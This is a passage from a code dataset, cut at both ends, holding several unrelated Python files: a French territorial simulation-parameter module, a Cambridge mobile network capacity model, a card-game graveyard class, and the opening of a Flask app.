hyp_name\n\n Returns\n -------\n None\n '''\n index_abs_val = []\n set_indices = set()\n for geocode in sorted(sterritories.keys(), reverse=True):\n for param, val in sterritories[geocode].items():\n try:\n if __debug__:\n logger.debug('Hyp Name : %s, param : %s, value : %d', hyp_name, param, val)\n index_name = self.tot_order[hyp_name][param]\n if self.def_types[hyp_name][param] == 'abs_val':\n index_abs_val.append((param, index_name))\n set_indices.update({index_name})\n else:\n self._update_param_matrix(geocode, index_name, ret, val)\n except KeyError as e:\n if __debug__:\n logger.error('Error in update_cat discard %s : KeyError : %s, for hyp : %s',\n param, e, hyp_name)\n raise\n return set_indices, index_abs_val\n\n def _update_abs_param(self, hyp_name, sterritories, index_abs_val, ret):\n '''\n Builds a dict applying abs hypo to the territories such that the sums of nested spatial units are ok\n\n Parameters\n ----------\n hyp_name : string\n hypothesis name, for example 'Demand_Tertiary_Consumption_Lighting'\n\n sterritories : dict\n contains the hypos for all the parameters of a given subcat and all territories concerned\n\n index_abs_val : list of tuples\n param name and its position in the np.ndarray\n\n ret : np.ndarray\n hypo array\n\n Returns\n -------\n None\n '''\n for param, index in index_abs_val:\n geo_dict = self._get_geo(param, sterritories)\n self._nested_update(hyp_name, geo_dict['FR99999'], ret, index, geocode='FR99999')\n\n def _nested_update(self, hyp_name, my_dict, ret, index, geocode=None):\n '''\n Recursive update of the hypo abs dict, so that the sums are ok\n\n Parameters\n ----------\n hyp_name : string\n hypothesis name, for example 'Demand_Tertiary_Consumption_Lighting'\n\n my_dict : dict\n contains the nested hypos\n\n index: int\n index of the current param in the np.ndarray\n\n ret : np.ndarray\n hypo array\n\n geocode : string\n a la 'FR99999'\n\n Returns\n -------\n None\n '''\n if len(my_dict) > 3:\n for key, val in my_dict.items():\n if isinstance(val, dict):\n self._nested_update(hyp_name, val, ret, index, geocode=key)\n if my_dict['val'] is not None:\n self._get_indices_val(hyp_name, my_dict, geocode, ret, index)\n\n def _get_indices_val(self, hyp_name, my_dict, geocode, ret, index):\n '''\n Updates the containing spatial unit with subunit values, making sure to return the increment\n\n Parameters\n ----------\n hyp_name : string\n hypothesis name, for example 'Demand_Tertiary_Consumption_Lighting'\n\n my_dict : dict\n contains the nested hypos\n\n index: int\n index of the current param in the np.ndarray\n\n ret : np.ndarray\n hypo array\n\n geocode : string\n a la 'FR99999'\n\n Returns\n -------\n None\n '''\n defmat = self._cache.get_val('Hypothesis:Default')\n initdistrib = self.get_variable(CalcVar(None, defmat[hyp_name], random_name=True)).copy()\n if geocode in self.cty_idx:\n start = self.cty_idx[geocode]['start']\n end = self.cty_idx[geocode]['end']\n mask = np.ones(initdistrib[:, index].shape, dtype=bool)\n mask[: start] = 0\n mask[end:] = 0\n for geo in my_dict['list_geo']:\n if geo in self.cty_idx:\n mask[self.cty_idx[geo]['start']: self.cty_idx[geo]['end']] = 0\n else:\n mask[self.geo_idx[geo]] = 0\n idx1 = self.geo_idx[geocode]\n if geocode == 'FR99999':\n ret[idx1, index] = my_dict['FR992' + geo[2:4]][geo]['val'] - initdistrib[idx1, index]\n else:\n ret[idx1, index] = my_dict[geo]['val'] - initdistrib[idx1, index]\n sumtot = initdistrib[mask, index].sum()\n if sumtot > 0:\n ret[mask, index] = initdistrib[mask, index] * ((my_dict['val'] - my_dict['sum']) / sumtot - 1)\n else:\n ret[mask, index] = (my_dict['val'] - my_dict['sum']) / mask.sum() - initdistrib[mask, index]\n else:\n idx1 = self.geo_idx[geocode]\n ret[idx1, index] = my_dict['val'] - initdistrib[idx1, index]\n\n def _get_geo(self, param, sterritories):\n '''\n Builds a nested dictionnary of the different geo scales and store hypo and their sum for abs_val\n\n Build nested dict and populate it :\n {'FR99999': {'val': None, 'sum': 0, 'list_geo': [],\n county1 : {'val': None, 'sum': 0, 'list_geo': []}}}\n\n Parameters\n ----------\n param : string\n parameter name, for example 'All_power_wind_powerchangemw'\n\n sterritories : dict\n contains the hypos for all the parameters of a given subcat and all territories concerned\n\n Returns\n -------\n dict\n Nested to reflect geographical inclusion, and sums of hypos at the different scales\n '''\n geo_dict = {'FR99999': {'val': None, 'sum': 0, 'list_geo': []}}\n for county in self.cty_idx:\n if county != 'FR99999':\n geo_dict['FR99999'].update({county: {'val': None, 'sum': 0, 'list_geo': []}})\n # for param find all geocodes that have this param in sterritorries and sort\n ret_list = []\n for key, val in sterritories.items():\n if param in val:\n ret_list.append(key)\n ret_list.sort(reverse=True)\n # set values in geo_dict depending on the geographical scope of the geocode\n for geocode in ret_list:\n if geocode == 'FR99999':\n geo_dict[geocode]['val'] = sterritories[geocode][param]\n elif geocode in self.cty_idx:\n geo_dict['FR99999'][geocode]['val'] = sterritories[geocode][param]\n # if there is hypo for france and a county, keep track of the sum of the hypos and which county\n if geo_dict['FR99999']['val'] is not None:\n geo_dict['FR99999']['sum'] += sterritories[geocode][param]\n geo_dict['FR99999']['list_geo'].append(geocode)\n else:\n geo_dict['FR99999']['FR992' + geocode[2:4]][geocode] = {'val': sterritories[geocode][param]}\n if geo_dict['FR99999']['FR992' + geocode[2:4]]['val'] is None:\n if geo_dict['FR99999']['val'] is not None:\n geo_dict['FR99999']['sum'] += sterritories[geocode][param]\n geo_dict['FR99999']['list_geo'].append(geocode)\n else:\n geo_dict['FR99999']['FR992' + geocode[2:4]]['sum'] += sterritories[geocode][param]\n geo_dict['FR99999']['FR992' + geocode[2:4]]['list_geo'].append(geocode)\n return geo_dict\n\n def _paramnames_vals_dict(self, hyp_name, subcat, val_dict, def_types, list_geo, subgroup):\n '''\n Reorder parameter dict in order to put whole param name as a key\n\n Parameters\n ----------\n subcat : string\n subcat name\n\n val_dict : dict\n contains the values associated to the territories\n\n ret : dict\n to be filled\n\n def_types: dict\n subdict of self.def_types for current cat\n\n mylen : int\n number of geocodes in territorygroup\n\n Returns\n -------\n np.ndarray\n dictionnary of hypo values\n '''\n raw_vals = self._param_geocode_val_dict(subcat, val_dict, subgroup)\n ret = {}\n list_pct = []\n for param_name, geodict in raw_vals.items():\n if def_types[param_name] == 'abs_val':\n self._group_abs_val(param_name, geodict, ret, list_geo)\n elif def_types[param_name] == 'percent_repartition':\n list_pct.append(param_name)\n else:\n self._group_default_attribution(param_name, geodict, ret, list_geo)\n list_grouped_pct = self.group_pct(list_pct, val_dict, subcat)\n setgrouped = set(['//'.join(sorted(subl)) for subl in list_grouped_pct])\n unique_grouped = []\n for el in list(setgrouped):\n temp = []\n for subname in el.split('//'):\n temp.append(subcat + '_' + subname)\n unique_grouped.append(temp)\n for group_param in unique_grouped:\n geodicts = [raw_vals[param_name] for param_name in group_param]\n self._group_percent_repartition(hyp_name, group_param, geodicts, ret, list_geo)\n return ret\n\n def group_pct(self, list_pct, val_dict, subcat):\n setfound = set()\n ret = []\n for param_name in list_pct:\n if param_name not in setfound:\n listkeys = []\n self.recursive_find_dict_path(param_name, val_dict, subcat, listkeys)\n ret.append([])\n for suffix in listkeys[-1]:\n setfound.update('_'.join(listkeys[: -1] + [suffix]))\n ret[-1].append('_'.join(listkeys[: -1] + [suffix]))\n return ret\n\n def recursive_find_dict_path(self, param_name, val_dict, tempname, listkeys):\n for key, val in val_dict.items():\n if tempname + '_' + key in param_name:\n if isinstance(val, dict):\n listkeys.append(key)\n self.recursive_find_dict_path(param_name, val, tempname + '_' + key, listkeys)\n else:\n listkeys.append(list(val_dict.keys()))\n\n def _group_default_attribution(self, param_name, geodict, ret, list_geo):\n '''\n In the case of regular parameters, insert hypo value, override territory group by subgroup if necessary\n\n Parameter\n ----------\n param_name : string\n parameter name\n\n geodict : dict\n {geocode:val}\n\n ret : dict\n to be filled {geocode:{param:val}}\n\n list_geo: list\n list of geocodes in territory group\n\n Returns\n -------\n None\n '''\n for geo in list_geo:\n if geo in geodict:\n val = geodict[geo]\n elif 'group' in geodict:\n val = geodict['group']\n else:\n continue\n if geo in ret:\n ret[geo][param_name] = val\n else:\n ret[geo] = {param_name: val}\n\n def _group_abs_val(self, param_name, geodict, ret, list_geo):\n '''\n In the case of abs val, insert hypo value, override territory group by subgroup if necessary\n\n Keep track of weight of geocodes (if region weight is number of commune), start by subgroup\n After subgroup, apply remaining values with proper weight\n\n Parameter\n ----------\n param_name : string\n parameter name\n\n geodict : dict\n {geocode:val}\n\n ret : dict\n to be filled {geocode:{param:val}}\n\n list_geo: list\n list of geocodes in territory group\n\n Returns\n -------\n None\n\n Note\n ----\n Careful with territorygroup = {region, commune in said region}, then weights are a little bit off\n '''\n geo_w = {}\n tot_w = 0\n for geo in list_geo:\n if geo in self.cty_idx:\n geo_w[geo] = self.cty_idx[geo]['end'] - self.cty_idx[geo]['start']\n else:\n geo_w[geo] = 1\n tot_w += geo_w[geo]\n if 'group' in geodict:\n tot_val = geodict['group']\n for geo in geodict:\n if geo != 'group':\n if geo in ret:\n ret[geo][param_name] = geodict[geo]\n else:\n ret[geo] = {param_name: geodict[geo]}\n if 'group' in geodict:\n tot_val -= geodict[geo]\n tot_w -= geo_w[geo]\n if 'group' in geodict:\n for geo in list_geo:\n if geo not in geodict:\n if geo not in ret:\n ret[geo] = {param_name: tot_val * geo_w[geo] / tot_w}\n else:\n ret[geo][param_name] = tot_val * geo_w[geo] / tot_w\n\n def _group_percent_repartition(self, hyp_name, param_names, geodicts, ret, list_geo):\n '''\n In the case of percent repartition, insert hypo value, override territory group by subgroup if necessary\n\n Consider the constraints\n\n Parameter\n ----------\n param_name : string\n parameter name\n\n geodict : dict\n {geocode:val}\n\n ret : dict\n to be filled {geocode:{param:val}}\n\n list_geo: list\n list of geocodes in territory group\n\n Returns\n -------\n None\n '''\n setgeo = set()\n for geo in list_geo:\n if geo in self.cty_idx:\n setgeo.update(self.geocodes[self.cty_idx[geo]['start']: self.cty_idx[geo]['end']])\n else:\n setgeo.update([geo])\n for geo in geodicts[0]:\n if geo != 'group':\n if geo not in ret:\n ret[geo] = {param_name: geodict[geo] for param_name, geodict in zip(param_names, geodicts)}\n else:\n ret[geo].update({param_name: geodict[geo] for param_name, geodict in zip(param_names, geodicts)})\n if geo in self.cty_idx:\n cty_geocodes = self.geocodes[self.cty_idx[geo]['start']: self.cty_idx[geo]['end']]\n cty_geocodes = list(set(cty_geocodes) - set(list_geo))\n listvals = [ret[geo][param_name] for param_name in param_names]\n self.compute_pct_rep(param_names, cty_geocodes, listvals, ret)\n setgeo = setgeo - set(cty_geocodes)\n else:\n setgeo - set([geo])\n if 'group' in geodicts[0]:\n listvals = [geodict['group'] for geodict in geodicts]\n self.compute_pct_rep(hyp_name, param_names, setgeo, listvals, ret)\n\n def compute_pct_rep(self, hyp_name, param_names, list_geo, listvals, ret):\n param_idxs = [self.tot_order[hyp_name][param_name] for param_name in param_names]\n geo_idxs = [self.geo_idx[geo] for geo in list_geo]\n tempcalc = CalcVar(None, self.def_mat[hyp_name], random_name=True)\n raw_pts = self.get_variable(tempcalc)[geo_idxs, :][:, param_idxs].copy()\n raw_w = np.expand_dims(self.pct_rep_w[hyp_name][param_names[0]][geo_idxs].copy(), axis=1)\n abs_pts = raw_pts * raw_w\n tot_pt = abs_pts.sum(axis=0)\n tot_pt_new = np.array(listvals) * raw_w.sum()\n if not all(tot_pt == tot_pt_new):\n delta_vect = tot_pt_new - tot_pt\n dists = self.delta_to_dists(abs_pts, delta_vect)\n pdeltas = self.point_deltas(dists, delta_vect)\n new_pts = abs_pts + pdeltas\n new_pts_renormed = div0(new_pts, raw_w)\n else:\n new_pts_renormed = raw_pts\n for idxx, geo in enumerate(list_geo):\n for idxy, param_name in enumerate(param_names):\n if geo in ret:\n ret[geo][param_name] = new_pts_renormed[idxx, idxy]\n else:\n ret[geo] = {param_name: new_pts_renormed[idxx, idxy]}\n\n def delta_to_dists(self, abs_pts, delta_vect):\n dists = []\n for onep in abs_pts:\n coeffs = []\n totsum = onep.sum()\n for idx, val in enumerate(onep):\n if delta_vect[idx] == 0:\n coeffs.append(1e10)\n coeffs.append(1e10)\n else:\n coeffs.append(-val / delta_vect[idx])\n coeffs.append((totsum - val) / delta_vect[idx])\n coeffs = np.array(coeffs)\n coeffs[np.where(coeffs < 0)] = coeffs.max()\n dists.append(coeffs.min())\n return np.array(dists)\n\n def dist_to_ref(self, idxref, abs_pts, delta_vect):\n dists = []\n for idx, point in enumerate(abs_pts):\n dists.append(np.abs(-point[idxref] / delta_vect[idxref]))\n return np.array(dists)\n\n def point_deltas(self, dists, delta_vect):\n return np.expand_dims(dists, axis=1) * np.expand_dims(delta_vect, axis=0) / dists.sum()\n\n def _param_geocode_val_dict(self, subcat, group_vals, subgroup):\n '''\n From values for the territory group and subgroup build a dict containing param_name : geocode : value\n\n Parameters\n ----------\n subcat : string\n subcat name\n\n group_vals : dict\n values for the territory group\n\n subgroup : dict\n geocodes as keys\n associated config values when user configures an independent geocode from a territorygroup\n\n Returns\n -------\n dict\n Flattened dictionnary of hypos for the whole territory group and subgroup\n '''\n if group_vals:\n temp1 = {'group': group_vals}\n else:\n temp1 = {}\n for geo in subgroup:\n temp1[geo] = subgroup[geo]['values']\n temp2 = {}\n for geo in temp1:\n initdict = {}\n self._flatten_name_value(subcat, temp1[geo], initdict)\n temp2[geo] = initdict\n ret = {}\n for geo, paramdict in temp2.items():\n for param_name, val in paramdict.items():\n if param_name in ret:\n ret[param_name][geo] = val\n else:\n ret[param_name] = {geo: val}\n return ret\n\n def _flatten_name_value(self, varname, mydict, store):\n '''\n Recursively flatten nested param names to a single '_'.join string and the associated value\n\n Parameters\n ----------\n varname : string\n '_' joined keys of the previous calls of this nested function\n\n mydict : dict\n current subdict of global hyp dict\n\n store : dict\n initialised as empty, and filled only with concatenated string as a single level dict of param_name : val\n\n Returns\n -------\n dict\n param_names : vals\n '''\n for key, val in mydict.items():\n newname = varname + '_' + key\n if isinstance(val, dict):\n self._flatten_name_value(newname, val, store)\n elif isinstance(val, list):\n raise ValueError('Hypo subdict has a list as value %s for param %s' % (val, newname))\n else:\n store[newname] = val\n\n def _dispatch_hypos_togeo(self, hyp_name, subcat, list_geo, val_dict, ret, subgroup, def_types):\n '''\n To every geocode associate a dict containing the param names and the values\n\n Parameters\n ----------\n subcat : string\n subcat name\n\n val_dict : dict\n contains the values associated to the territories\n\n ret : dict\n geocodes and the hypo vals for the current cat parameters\n\n def_types: dict\n subdict of self.def_types for current cat\n\n list_geo : list\n list of geocodes\n\n subgroup : dict\n geocodes as keys\n associated config values when user configures an independent geocode from a territorygroup\n\n Returns\n -------\n None\n '''\n value = self._paramnames_vals_dict(hyp_name, subcat, val_dict, def_types, list_geo, subgroup)\n for geocode in value:\n if geocode in ret:\n if __debug__:\n logger.warning('Found geocode %s in multiple hypotheses : %s and %s',\n geocode, ret[geocode], val_dict)\n pass\n else:\n ret[geocode] = value[geocode]\n\n def _update_param_matrix(self, geocode, index, ret, val):\n '''\n Update default value for a given geocode and param index\n\n Parameters\n ----------\n geocode : string\n geocode name, can be a county\n\n index : int\n index of column corresponding to the parameter to be udpated\n\n ret : np.ndarray\n shape (Ngeo, Nparams) corresponding to the default values\n\n val : float\n value with which ret is to be updated in col index and line corresponding to geocode\n\n Returns\n -------\n None\n updates the ret array in place\n '''\n if geocode < 'FR99000':\n try:\n geo_ind = self.geo_idx[geocode]\n if __debug__:\n logger.debug('Updating matrix element [%d,%d] with %d', geo_ind, index, val)\n ret[geo_ind, index] = val\n except KeyError as e:\n if __debug__:\n logger.error('Unknown geocode %s : %s', geocode, e)\n raise\n else:\n try:\n county = self.cty_idx[geocode]\n if __debug__:\n logger.debug('Updating matrix elements [%d:%d,%d] with %d',\n county['start'], county['end'], index, val)\n ret[county['start']: county['end'], index] = np.repeat([[val]], county['end'] - county['start'])\n except KeyError as e:\n if __debug__:\n logger.error('Unknown county %s : %s', geocode, e)\n raise\n","sub_path":"Calculus/ExtractSimuParameters.py","file_name":"ExtractSimuParameters.py","file_ext":"py","file_size_in_byte":46002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"606591880","text":"\"\"\"Cambridge Communications Assessment Model\n\"\"\"\nfrom collections import defaultdict\nfrom itertools import tee\nfrom pprint import pprint\n\nclass NetworkManager(object):\n \"\"\"\n Model controller class.\n\n Represents postcode sectors nested in local area districts,\n with all affiliated assets, capacities and clutter types.\n\n Parameters\n ----------\n lads: :obj:`list` of :obj:`dict`\n List of local area districts\n * id: :obj:`int`\n Unique ID\n * name: :obj:`str`\n Name of the LAD\n pcd_sectors: :obj:`list` of :obj:`dict`\n List of postcode sectors (pcd)\n * id: :obj:`str`\n Postcode name\n * lad_id: :obj:`int`\n Unique ID\n * population: :obj:`int`\n Number of inhabitants\n * area: :obj:`float`\n Areas size in square kilometers (km^2)\n * user_throughput: :obj:`int`\n Per user monthly data demand in gigabytes (GB)\n assets: :obj:`list` of :obj:`dict`\n List of assets\n * pcd_sector: :obj:`str`\n Code of the postcode sector\n * site_ngr: :obj:`int`\n Unique site reference number\n * technology: :obj:`str`\n Abbreviation of the asset technology (LTE, 5G etc.)\n * frequency: :obj:`str`\n Spectral frequency(s) the asset operates at (800, 2600, ..)\n * bandwidth: :obj:`str`\n Downlink bandwith of the asset (10MHz, ..)\n * build_date: :obj:`int`\n Build year of the asset\n capacity_lookup_table: dict\n Dictionary that represents the clutter/asset type, spectrum\n frequency and channel bandwidth, and the consequential\n cellular capacity provided for different asset densities.\n * key: :obj:`tuple`\n * 0: :obj:`str`\n Area type ('urban', 'suburban' or 'rural') or asset\n type ('small_cells')\n * 1: :obj:`str`\n Frequency of the asset configuration (800, 2600, ..)\n * 2: :obj:`str`\n Bandwith of the asset configuration (10, 40, ..)\n * value: :obj:`list` of :obj:`tuple`\n * 0: :obj:`int`\n Cellular asset density per square kilometer (sites per km^2)\n * 1: :obj:`int`\n Average Radio Access Network capacity in Mbps per square\n kilometer (Mbps/km^2)\n clutter_lookup: list of tuples\n Each element represents the settlement definitions for\n urban, suburban and rural by population density in square\n kilometers (persons per km^2)\n * 0: :obj:`int`\n Population density in persons per km^2.\n * 1: :obj:`string`\n Settlement type (rban, suburban and rural)\n simulation_parameters: dict\n Contains all simulation parameters, set in the run script.\n * market_share: :obj: 'int'\n Percentage market share of the modelled hypothetical operator.\n * annual_budget: :obj: 'int'\n Annual budget to spend.\n * service_obligation_capacity: :obj: 'int'\n Required service obligation.\n * busy_hour_traffic_percentage: :obj: 'int'\n Percentage of daily traffic taking place in the busy hour.\n * coverage_threshold: :obj: 'int'\n The threshold we wish to measure the served population against.\n * penetration: :obj: 'int'\n The penetration of users with smartphone and data access.\n\n \"\"\"\n def __init__(self, lads, pcd_sectors, assets, capacity_lookup_table,\n clutter_lookup, simulation_parameters):\n\n self.lads = {}\n\n self.postcode_sectors = {}\n\n for lad_data in lads:\n lad_id = lad_data[\"id\"]\n self.lads[lad_id] = LAD(lad_data, simulation_parameters)\n\n assets_by_pcd = defaultdict(list)\n for asset in assets:\n assets_by_pcd[asset['pcd_sector']].append(asset)\n\n for pcd_sector_data in pcd_sectors:\n\n try:\n lad_id = pcd_sector_data[\"lad_id\"]\n pcd_sector_id = pcd_sector_data[\"id\"]\n assets = assets_by_pcd[pcd_sector_id]\n pcd_sector = PostcodeSector(pcd_sector_data, assets,\n capacity_lookup_table, clutter_lookup, simulation_parameters, 0)\n self.postcode_sectors[pcd_sector_id] = pcd_sector\n\n lad_containing_pcd_sector = self.lads[lad_id]\n lad_containing_pcd_sector.add_pcd_sector(pcd_sector)\n except:\n print('could not create object for {}'.format(pcd_sector_data[\"id\"]))\n print(pcd_sector_data)\n pass\n\n\nclass LAD(object):\n \"\"\"\n Local area district.\n\n Represents an area to be modelled. Contains data for demand\n characterisation and assets for supply assessment.\n\n Arguments\n ---------\n data: dict\n Metadata and info for the LAD\n * id: :obj:`int`\n Unique ID\n * name: :obj:`str`\n Name of the LAD\n simulation_parameters: dict\n Contains all simulation parameters, set in the run script.\n * market_share: :obj: 'int'\n Percentage market share of the modelled hypothetical operator.\n * annual_budget: :obj: 'int'\n Annual budget to spend.\n * service_obligation_capacity: :obj: 'int'\n Required service obligation.\n * busy_hour_traffic_percentage: :obj: 'int'\n Percentage of daily traffic taking place in the busy hour.\n * coverage_threshold: :obj: 'int'\n The threshold we wish to measure the served population against.\n * penetration: :obj: 'int'\n The penetration of users with smartphone and data access.\n\n \"\"\"\n def __init__(self, data, simulation_parameters):\n self.id = data[\"id\"]\n self.name = data[\"name\"]\n self._pcd_sectors = {}\n\n def __repr__(self):\n return \"\".format(self.id, self.name)\n\n\n @property\n def population(self):\n return sum([\n pcd_sector.population\n for pcd_sector in self._pcd_sectors.values()])\n\n @property\n def area(self):\n return sum([\n pcd_sector.area\n for pcd_sector in self._pcd_sectors.values()])\n\n @property\n def population_density(self):\n total_area = sum([\n pcd_sector.area\n for pcd_sector in self._pcd_sectors.values()])\n if total_area == 0:\n return 0\n else:\n return self.population / total_area\n\n\n def add_pcd_sector(self, pcd_sector):\n self._pcd_sectors[pcd_sector.id] = pcd_sector\n\n\n def capacity(self):\n \"\"\"Return the mean capacity from all nested postcode sectors\n \"\"\"\n if not self._pcd_sectors:\n return 0\n\n summed_capacity = sum([\n pcd_sector.capacity\n for pcd_sector in self._pcd_sectors.values()])\n return summed_capacity / len(self._pcd_sectors)\n\n\n def demand(self):\n \"\"\"Return the mean capacity demand from all nested postcode sectors\n \"\"\"\n if not self._pcd_sectors:\n return 0\n\n summed_demand = sum(\n pcd_sector.demand * pcd_sector.area\n for pcd_sector in self._pcd_sectors.values()\n )\n summed_area = sum(\n pcd_sector.area\n for pcd_sector in self._pcd_sectors.values()\n )\n\n return summed_demand / summed_area\n\n\n def coverage(self, simulation_parameters):\n \"\"\"Return proportion of population with capacity coverage over a threshold\n \"\"\"\n if not self._pcd_sectors:\n return 0\n\n threshold = simulation_parameters['coverage_threshold']\n\n population_with_coverage = sum([\n pcd_sector.population\n for pcd_sector in self._pcd_sectors.values()\n if pcd_sector.capacity >= threshold])\n\n total_pop = sum([\n pcd_sector.population\n for pcd_sector in self._pcd_sectors.values()])\n\n return float(population_with_coverage) / total_pop\n\n\nclass PostcodeSector(object):\n \"\"\"Represents a pcd_sector to be modelled\n \"\"\"\n def __init__(self, data, assets, capacity_lookup_table,\n clutter_lookup, simulation_parameters, testing):\n\n self.id = data[\"id\"]\n self.lad_id = data[\"lad_id\"]\n self.population = data[\"population\"]\n self.area = data[\"area_km2\"]\n self.user_throughput = data[\"user_throughput\"]\n self.penetration = simulation_parameters['penetration']\n self.busy_hour_traffic = simulation_parameters['busy_hour_traffic_percentage']\n\n self.market_share = simulation_parameters['market_share']\n self.user_demand = self._calculate_user_demand(\n self.user_throughput, simulation_parameters)\n\n self.demand_density = self.demand / self.area\n\n self._capacity_lookup_table = capacity_lookup_table\n self._clutter_lookup = clutter_lookup\n self.clutter_environment = lookup_clutter_geotype(\n self._clutter_lookup,\n self.population_density\n )\n\n self.assets = assets\n\n self.site_density_macrocells = self._calculate_site_density_macrocells()\n self.site_density_small_cells = self._calculate_site_density_small_cells()\n\n self.capacity = (\n self._macrocell_site_capacity(simulation_parameters, testing) +\n self.small_cell_capacity(simulation_parameters, testing)\n )\n\n\n def __repr__(self):\n return \"\".format(self.id)\n\n def _calculate_site_density_macrocells(self):\n\n unique_sites = set()\n for asset in self.assets:\n if asset['type'] == 'macrocell_site':\n unique_sites.add(asset['site_ngr'])\n\n site_density = float(len(unique_sites)) / self.area\n\n return site_density\n\n\n def _calculate_site_density_small_cells(self):\n\n small_cells = []\n for asset in self.assets:\n if asset['type'] == 'small_cell':\n small_cells.append(asset)\n\n site_density = float(len(small_cells)) / self.area\n\n return site_density\n\n\n def _calculate_user_demand(self, user_throughput, simulation_parameters):\n \"\"\"Calculate Mb/second from GB/month supplied as throughput scenario\n\n E.g.\n 2 GB per month\n * 1024 to find MB\n * 8 to covert bytes to bits\n * busy_hour_traffic = daily traffic taking place\n in the busy hour\n * 1/30 assuming 30 days per month\n * 1/3600 converting hours to seconds,\n = ~0.01 Mbps required per user\n \"\"\"\n busy_hour_traffic = simulation_parameters['busy_hour_traffic_percentage'] / 100\n\n demand = user_throughput * 1024 * 8 * busy_hour_traffic / 30 / 3600\n\n return demand\n\n\n @property\n def demand(self):\n \"\"\"\n Estimate total demand based on population and penetration.\n\n E.g.\n 0.02 Mbps per user during busy hours\n * 100 population\n * 0.8 penetration\n / 10 km^2 area\n = ~0.16 Mbps/km^2 area capacity demand\n\n \"\"\"\n users = self.population * (self.penetration / 100) * self.market_share\n\n user_throughput = users * self.user_demand\n\n capacity_per_kmsq = user_throughput / self.area\n\n return capacity_per_kmsq\n\n\n @property\n def population_density(self):\n \"\"\"\n Calculate population density for a specific population and area.\n\n \"\"\"\n return self.population / self.area\n\n\n def _macrocell_site_capacity(self, simulation_parameters, testing):\n \"\"\"\n Find the macrocellular Radio Access Network capacity given the\n area assets and deployed frequency bands.\n\n \"\"\"\n capacity = 0\n\n for frequency in ['700', '800', '1800', '2600', '3500', '26000']:\n unique_sites = set()\n for asset in self.assets:\n for asset_frequency in asset['frequency']:\n\n if asset_frequency == frequency:\n unique_sites.add(asset['site_ngr'])\n\n site_density = float(len(unique_sites)) / self.area\n\n bandwidth = find_frequency_bandwidth(frequency,\n simulation_parameters)\n\n if frequency == '700' or frequency == '3500' or frequency == '26000':\n generation = '5G'\n else:\n generation = '4G'\n\n tech_capacity = lookup_capacity(\n self._capacity_lookup_table,\n self.clutter_environment,\n frequency,\n bandwidth,\n generation,\n site_density,\n 0)\n\n capacity += tech_capacity\n\n return capacity\n\n\n def small_cell_capacity(self, simulation_parameters, testing):\n \"\"\"\n Find the small cell Radio Access Network capacity given the\n area assets and deployed frequency bands.\n\n \"\"\"\n num_small_cells = len([\n asset\n for asset in self.assets\n if asset['type'] == \"small_cell\"\n ])\n\n site_density = float(num_small_cells) / self.area\n\n capacity = lookup_capacity(\n self._capacity_lookup_table,\n \"small_cells\",\n \"3700\",\n \"25\",\n \"5G\",\n site_density,\n testing)\n\n return capacity\n\n\ndef find_frequency_bandwidth(frequency, simulation_parameters):\n \"\"\"\n Finds the correct bandwidth for a specific frequency from the\n simulation parameters.\n\n \"\"\"\n simulation_parameter = 'channel_bandwidth_{}'.format(frequency)\n\n if simulation_parameter not in simulation_parameters.keys():\n KeyError('{} not specified in simulation_parameters'.format(frequency))\n\n bandwidth = simulation_parameters[simulation_parameter]\n\n return bandwidth\n\n\ndef pairwise(iterable):\n \"\"\"Return iterable of 2-tuples in a sliding window\n\n >>> list(pairwise([1,2,3,4]))\n [(1,2),(2,3),(3,4)]\n \"\"\"\n a, b = tee(iterable)\n next(b, None)\n return zip(a, b)\n\n\ndef lookup_clutter_geotype(clutter_lookup, population_density):\n \"\"\"Return geotype based on population density\n\n Params:\n ======\n clutter_lookup : list of (population_density_upper_bound, geotype) tuples\n sorted by population_density_upper_bound ascending\n \"\"\"\n highest_popd, highest_geotype = clutter_lookup[2]\n middle_popd, middle_geotype = clutter_lookup[1]\n lowest_popd, lowest_geotype = clutter_lookup[0]\n\n if population_density < middle_popd:\n return lowest_geotype\n\n elif population_density > highest_popd:\n return highest_geotype\n\n else:\n return middle_geotype\n\n\ndef lookup_capacity(lookup_table, clutter_environment, frequency, bandwidth, generation, site_density, testing):\n \"\"\"\n Use lookup table to find capacity by clutter environment geotype,\n frequency, bandwidth and site density.\n\n \"\"\"\n if (clutter_environment, frequency, bandwidth, generation) not in lookup_table:\n raise KeyError(\"Combination %s not found in lookup table\",\n (clutter_environment, frequency, bandwidth, generation))\n density_capacities = lookup_table[(clutter_environment, frequency, bandwidth, generation)]\n\n lowest_density, lowest_capacity = density_capacities[0]\n if site_density < lowest_density:\n return 0\n\n for a, b in pairwise(density_capacities):\n lower_density, lower_capacity = a\n upper_density, upper_capacity = b\n if lower_density <= site_density and site_density < upper_density:\n return interpolate(lower_density, lower_capacity, upper_density, upper_capacity, site_density)\n\n # If not caught between bounds return highest capacity\n highest_density, highest_capacity = density_capacities[-1]\n\n return highest_capacity\n\n\ndef interpolate(x0, y0, x1, y1, x):\n \"\"\"\n Linear interpolation between two values.\n\n \"\"\"\n y = (y0 * (x1 - x) + y1 * (x - x0)) / (x1 - x0)\n return y\n","sub_path":"digital_comms/mobile_network/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"158639849","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n#author:iuyyoy \n#content:Graveyard class\n\nfrom __future__ import division, print_function, unicode_literals\n\nimport random\nfrom cocos import text as CText\n\nfrom Game.Global import *\nfrom Game.Scripts import *\n\n#坟场类\nclass Graveyard(object):\n \n def __init__(self):\n self.total = {\n 'dead':[],\n 'minion':[],\n 'spell':[],\n 'card':[]\n }\n self.destroyed = []\n self.thisturn = {\n 'dead':[],\n 'minion':[],\n 'spell':[],\n 'card':[],\n }\n \n return super(Graveyard, self).__init__()\n\n def destroyACard(self, card):\n self.destroyed.append(type(card))\n def destroyAMinion(self, minion):\n self.thisturn['dead'].append(type(minion))\n self.total['dead'].append(type(minion))\n def useACard(self, card):\n self.thisturn[card.type].append(type(card))\n self.total[card.type].append(type(card))\n def finishTurn(self):\n self.thisturn['dead'] = []\n self.thisturn['minion'] = []\n self.thisturn['spell'] = []\n self.thisturn['card'] = []\n ","sub_path":"Game/Players/CardSets/Graveyard.py","file_name":"Graveyard.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"403492771","text":"from flask import Flask, render_template\nimport mysql.connector\nimport secret_config\nfrom statistics import mean, mode, variance\n\napp = Flask(__name__)\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n 